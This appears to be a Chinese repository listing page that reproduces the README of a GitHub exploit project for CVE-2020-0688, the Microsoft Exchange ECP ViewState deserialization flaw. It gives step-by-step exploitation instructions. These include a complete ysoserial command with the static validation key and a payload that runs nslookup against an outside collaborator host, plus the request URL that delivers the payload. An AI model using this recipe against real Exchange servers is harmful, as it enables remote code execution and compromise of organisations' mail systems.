项目作者： random-robbie

项目描述：
cve-2020-0688

高级语言： Python

项目主页：

项目地址: git://github.com/random-robbie/cve-2020-0688.git

创建时间： 2020-02-25T23:44:16Z
项目社区：https://github.com/random-robbie/cve-2020-0688
开源协议：
下载

cve-2020-0688

Login with a user with an email address privliage is nothing to worry about.

Grab - __VIEWSTATEGENERATOR from page source
Grab - the value of ASP.NET_SessionId cookie for viewstateuserkey value

Download YSO Here

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

GET TO:

https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>

The Exploit.py is untested and need a demo system to fire up and play with.


